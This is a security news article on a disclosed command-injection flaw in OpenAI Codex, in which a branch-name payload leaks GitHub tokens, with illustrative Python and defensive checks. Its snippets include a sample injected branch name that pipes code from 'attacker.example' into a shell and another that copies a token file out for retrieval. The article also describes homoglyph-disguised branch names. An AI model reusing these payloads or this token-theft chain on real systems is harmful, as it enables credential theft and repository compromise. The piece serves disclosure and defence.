The rapid adoption of AI coding assistants has introduced new and high-impact attack surfaces for modern development teams. A recent discovery by researchers at BeyondTrust highlights a critical command injection vulnerability in OpenAI Codex, capable of exposing sensitive GitHub access tokens and enabling full repository compromise.
What Is the OpenAI Codex Command Injection Vulnerability?
OpenAI Codex is a cloud-based AI development tool that integrates directly with GitHub repositories to automate tasks such as code generation, analysis, and pull request reviews.
Researchers discovered that Codex improperly handled user-controlled input, specifically the GitHub branch name parameter in HTTP POST requests. This input was passed directly into backend setup scripts without proper sanitization, creating a classic command injection vulnerability.
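The bug class is easiest to see side by side. The sketch below is illustrative Python, not Codex's actual backend code: it contrasts interpolating an attacker-controlled branch name into a shell string with passing it as a discrete argument.

```python
import shlex

def build_checkout_unsafe(branch: str) -> str:
    # Vulnerable pattern (illustrative): the user-controlled branch name is
    # interpolated into a string later run through a shell, so metacharacters
    # like ";" or "$( )" are interpreted as additional commands.
    return f"git checkout {branch}"

def build_checkout_safe(branch: str) -> list[str]:
    # Safer pattern: build an argv list and end option parsing with "--".
    # Executed without a shell, the branch stays a single inert argument.
    return ["git", "checkout", "--", branch]

def build_checkout_quoted(branch: str) -> str:
    # If a shell string is unavoidable, shlex.quote neutralizes metacharacters.
    return f"git checkout -- {shlex.quote(branch)}"

payload = "main; curl https://attacker.example/x.sh | sh"
print(build_checkout_unsafe(payload))  # a shell would run the curl pipeline
print(build_checkout_safe(payload))    # branch remains one argv element
```

The fix for this entire class of bug is the second and third forms: never let untrusted bytes reach a shell parser.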
How the Exploit Works
Attackers can exploit this flaw using a maliciously crafted branch name:
- Inject a shell command payload into the branch name
- Codex executes the payload inside a managed container
- The payload extracts hidden GitHub OAuth tokens
- Tokens are written to an accessible file
- The attacker retrieves the file via Codex prompts
This results in full token exposure in plaintext.
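The chain above can be simulated in a few lines. Everything here is a hedged reconstruction: the setup-script template, file paths, and token location are assumptions for illustration, not Codex internals.

```python
# Hypothetical setup-script template: the branch name arrives from an HTTP
# POST parameter and is pasted into a shell line (the reported flaw).
SETUP_TEMPLATE = "git fetch origin && git checkout {branch} && ./setup.sh"

# Step 1: the attacker supplies a branch name carrying a shell payload that
# copies a (hypothetical) token file somewhere readable via Codex prompts.
malicious_branch = "main; cat /tmp/creds/github_token > /workspace/out.txt; true"

# Step 2: the backend renders the template without sanitization.
rendered = SETUP_TEMPLATE.format(branch=malicious_branch)
print(rendered)

# Steps 3-5: when a shell executes `rendered`, the injected `cat` runs inside
# the managed container, writing the token to a file the attacker later
# retrieves through ordinary prompts.
```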
Impact: Full GitHub Account and Repository Compromise
Once attackers obtain a valid token, they can:
- Access private repositories
- Modify source code
- Inject malicious commits
- Perform lateral movement across the organization
Because tokens inherit the exact permissions of the AI agent, the impact can escalate to organization-wide compromise.
Local Token Theft Across Windows, macOS, and Linux
The vulnerability extended beyond the cloud environment.
Researchers found that Codex desktop applications store authentication data locally. If an attacker gains access to a developer’s machine, they can extract local session tokens, authenticate directly to backend APIs, retrieve full task history, and extract hidden GitHub tokens from logs.
This enables silent, large-scale data exfiltration.
Advanced Attack Technique: Malicious Branch Injection
Attackers can scale the exploit across shared repositories by creating a malicious branch whose name embeds the payload. The payload can be disguised using Unicode characters and crafted to bypass GitHub's ref-naming restrictions.
To the victim, the branch appears identical to a legitimate one, such as the main branch.
Once accessed, the payload executes silently and sends the GitHub token to an attacker-controlled server.
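The disguise technique can be illustrated with a common homoglyph. The specific characters used in the real attack are not public; this example swaps a Latin "a" for its Cyrillic lookalike.

```python
import unicodedata

legit = "main"
spoofed = "m\u0430in"  # U+0430 CYRILLIC SMALL LETTER A renders like Latin "a"

print(spoofed)           # displays like "main" in most fonts
print(legit == spoofed)  # False: different code points
print([unicodedata.name(c) for c in spoofed])

def looks_obfuscated(name: str) -> bool:
    # Cheap tripwire: git branch names are conventionally ASCII, so any
    # non-ASCII character in a ref name deserves human review.
    return not name.isascii()
```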
Automated Exploitation via Pull Requests
The attack becomes more dangerous when combined with automation. When a developer triggers Codex for a code review, the system launches a container. If the repository contains the malicious branch, the payload executes automatically and allows attackers to steal GitHub Installation Access Tokens without direct interaction.
Affected Platforms
This critical vulnerability impacted:
- ChatGPT web interface
- Codex CLI
- Codex SDK
- Codex IDE extensions
The issue was responsibly disclosed in December 2025 and fully patched by January 2026.
Cybersecurity Best Practices to Prevent AI-Based Attacks
Organizations should adopt the following security measures:
Input Validation and Sanitization
Never pass unsanitized user input into shell commands.
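One way to apply this advice is an allowlist check before a branch name ever reaches a shell. The character class below is an illustrative, conservative choice, not an official rule set.

```python
import re

# Conservative allowlist: letters, digits, dot, underscore, slash, hyphen.
_BRANCH_RE = re.compile(r"[A-Za-z0-9._/-]+")

def is_safe_branch_name(name: str) -> bool:
    return (
        bool(_BRANCH_RE.fullmatch(name))
        and ".." not in name          # blocks path traversal in refs
        and not name.startswith("-")  # could be parsed as a git option
    )

print(is_safe_branch_name("feature/login-form"))  # True
print(is_safe_branch_name("main; rm -rf /"))      # False: shell metacharacters
print(is_safe_branch_name("m\u0430in"))           # False: non-ASCII homoglyph
```

Rejecting by allowlist is safer than blocklisting metacharacters, since it also catches the Unicode tricks described above.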
Zero Trust for External Data
Treat all external provider inputs as untrusted.
Enforce Least Privilege
Limit permissions assigned to AI agents.
Repository Monitoring
Detect unusual branch names and flag Unicode obfuscation or shell metacharacters.
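A monitoring job might sweep repository refs and report anything matching those heuristics. This sketch assumes the branch list has already been fetched (for example via `git branch -r` or the GitHub API).

```python
import re

_SHELL_META = re.compile(r"[;&|$`<>(){}\s'\"\\]")

def flag_branches(branches: list[str]) -> list[tuple[str, str]]:
    """Return (branch, reason) pairs for ref names worth a human look."""
    flagged = []
    for name in branches:
        if not name.isascii():
            flagged.append((name, "non-ASCII characters (possible confusables)"))
        elif _SHELL_META.search(name):
            flagged.append((name, "shell metacharacters"))
    return flagged

print(flag_branches(["main", "feature/x", "m\u0430in", "fix; id"]))
```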
Token Security
Rotate GitHub tokens regularly and monitor API logs for suspicious activity.
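Part of that monitoring can be automated: GitHub's documented token prefixes (`ghp_`, `gho_`, `ghu_`, `ghs_`, `ghr_`) make leaked credentials greppable in logs. The length threshold below is a heuristic to limit false positives, not a specification.

```python
import re

# Match documented GitHub token prefixes followed by a long alphanumeric
# tail; 36+ characters is a heuristic cutoff, not GitHub's exact format.
_TOKEN_RE = re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b")

def find_leaked_tokens(log_text: str) -> list[str]:
    # Scan log output for strings shaped like GitHub tokens.
    return _TOKEN_RE.findall(log_text)

sample = "task log: auth ok token=gho_" + "A" * 36 + " done"
print(find_leaked_tokens(sample))
```

Any hit should trigger immediate rotation of the matched credential, not just an alert.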
Final Takeaway
The vulnerability in OpenAI Codex marks a broader shift in cybersecurity: AI-powered development tools are now high-value attack targets.
Organizations must treat AI containers, automation pipelines, and integrations as strict security boundaries, applying the same level of security controls used in traditional infrastructure.